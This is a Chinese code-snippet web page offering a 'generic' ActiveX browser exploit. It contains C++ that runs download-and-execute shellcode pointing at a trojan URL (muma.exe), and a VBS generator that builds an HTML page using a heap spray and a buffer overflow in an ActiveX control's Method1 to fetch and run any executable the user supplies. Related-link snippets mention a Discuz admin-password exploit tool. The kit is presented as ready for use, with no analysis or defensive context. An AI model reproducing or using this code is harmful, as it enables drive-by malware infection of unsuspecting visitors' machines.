ActiveX漏洞通用Exploit vbs修正版

C++代码


代码如下:

#include <stdio.h>     
#include <string.h>

unsigned char shellcode[] =     
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"    
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"    
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"    
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"    
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"    
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"    
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"    
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"    
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"    
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"    
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"    
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"    
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"    
"http://fenggou.net/muma.exe";

int main()     
{     
void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用     
* (int *) & code = shellcode;     
code();     
}

vbs代码


代码如下:

exeurl = InputBox( "Please input you want down&exec url:", "输入","http://jb51.net/muma.exe" )    
if exeurl <> "" then    
code="\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"&Unicode(exeurl&Chr(00)&Chr(00))    
Function Unicode(str1)    
Dim str,temp    
str = ""   
For i=1 to len(str1)    
temp = Hex(AscW(Mid(str1,i,1)))    
If len(temp) < 5 Then temp = right("0000"&temp, 2)    
str = str & "\x" & temp    
Next    
Unicode = str    
End Function    
function replaceregex(str)    
set regex=new regExp    
regex.pattern="\\x(..)\\x(..)"   
regex.IgnoreCase=true   
regex.global=true   
matches=regex.replace(str,"%u$2$1")    
replaceregex=matches    
end Function    
set fso=createObject("scripting.filesystemobject")    
if fso.FileExists("jb51.htm") then    
fso.deleteFile "jb51.htm",True    
end If    
set fileS=fso.opentextfile("jb51.htm",8,true)    
fileS.writeline "<html>"   
fileS.writeline "<title>Sina</title>"   
fileS.writeline "<object classid=""clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D"" id='target'></object>"   
fileS.writeline "<body>"   
fileS.writeline "<SCRIPT language=""JavaScript"">"   
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"   
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"   
fileS.writeline "var headersize = 20;"   
fileS.writeline "var slackspace = headersize+shellcode.length;"   
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"   
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"   
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"   
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"   
fileS.writeline "memory = new Array();"   
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"   
fileS.writeline "var buffer = '';"   
fileS.writeline "while (buffer.length < 218) buffer+='\x0a\x0a\x0a\x0a';"   
fileS.writeline "target.Method1(buffer);"   
fileS.writeline "</script>"   
fileS.writeline "</body>"   
fileS.writeline "</html>"   
files.Close    
Set fso=nothing    
end if

(0)

相关推荐

  • ActiveX漏洞通用Exploit vbs修正版

    C++代码 复制代码 代码如下: #include <stdio.h>      #include <string.h> unsigned char shellcode[] =      "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"     "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x

  • discuz 任意管理员密码漏洞利用工具 vbs代码

    也利于修改 以下是search.inc.php 文件漏洞利用代码VBS版 复制代码 代码如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid

  • Jquery.LazyLoad.js修正版下载,实现图片延迟加载插件

    从网上下载来的版本多多少少都有些BUG,尤其是加载后在IE6和IE7下图片闪动是个大问题,在网上查了很久,也没有找到相关的解决方案.没解决方案,就得发挥咱DIY的精神,自己想法解决,分析了BUG,理了理思路,结合前段时间我做弹出窗口特效的方法,解决了Jquery.LazyLoad.js的兼容问题,现将思路和方法与大家分享一下. 解决思路大致是两点,一是从LazyLoad本身的滤镜参数下手,发现有一个参数在IE6和IE7是可以用的,就是show,那么在IE6和IE7下用这个特效:二是IE8以上(包

  • js模拟弹出效果代码修正版

    模拟弹出效果代码修正版 从网上看到的代码,当文章内容较多时,总会提示 复制代码 代码如下: --------------------------- Windows Internet Explorer --------------------------- Internet Explorer 无法打开 Internet 站点 应该是页面没加载完,所以我判断下,等页面加载完了,再运行 复制代码 代码如下: window.onload=function(){ var oo = new fw.com.u

  • JS获得鼠标位置(兼容多浏览器ie,firefox)脚本之家修正版

    JS获得鼠标位置(兼容多浏览器ie,firefox)我们修正版 function mouseMove(ev) { ev= ev || window.event; var mousePos = mouseCoords(ev); //alert(ev.pageX); document.getElementById("xxx").value = mousePos.x; document.getElementById("yyy").value = mousePos.y; }

  • javascript 文字上下间隔滚动的代码 符合WEB标准 脚本之家修正版

    第一个 文字上下间隔滚动 修正版 符合WEB标准的文字间隔滚动JS代码 var marqueeContent=new Array(); //滚动新闻 marqueeContent[0]='14:25 HTML/JS互相转换工具-IE7兼容版'; marqueeContent[1]='14:25 css 在线压缩工具'; marqueeContent[2]='14:25 CSS整形与最佳化工具[压缩]'; marqueeContent[3]='14:25 JS Minifier js压缩'; va

  • python3.X 抓取火车票信息【修正版】

    代码是在源代码的基础上进行的修改.希望对你有所帮助! 实现后如图所示: 首先我们需要抓取一些基础的数据,各大火车站信息! import urllib from urllib import request import re url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.8955' req = urllib.request.Request(url) r = urll

  • VBS加密解密源码(UserAccounts.CommonDialog) 脚本之家修正版

    用法: 1.copy下面代码至文本文档 2.将文件后缀名改为.vbs 3.双击运行 复制代码 代码如下: Ans = InPutBox("请输入要执行的操作:1.加密,2.解密,3.退出.") Ans = Int(Ans) If Ans =1 Then set fso=createobject("scripting.filesystemobject") Set objDialog = CreateObject("UserAccounts.CommonDia

  • Rcmd.vbs 1.01修正版 增加了下载功能

    这个down.vbs的用法看这里http://www.jb51.net/article/15506.htm 代码: 复制代码 代码如下: On Error Resume Next Set outstreem=Wscript.stdout If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then Wscript.Quit End If If Wscript.arguments.Count<4 Then Wscript.ech

  • 10条PHP高级技巧[修正版]

    1.使用一个SQL注射备忘单 一个基本的原则就是,永远不要相信用户提交的数据. 另一个规则就是,在你发送或者存储数据时对它进行转义(escape). 可以总结为:filter input, escape output (FIEO). 输入过滤,输出转义. 通常导致SQL注射漏洞的原因是没有对输入进行过滤,如下语句: 复制代码 代码如下: <?php $query = "SELECT * FROM users WHERE name = '{$_GET['name']}'"; 在这个

随机推荐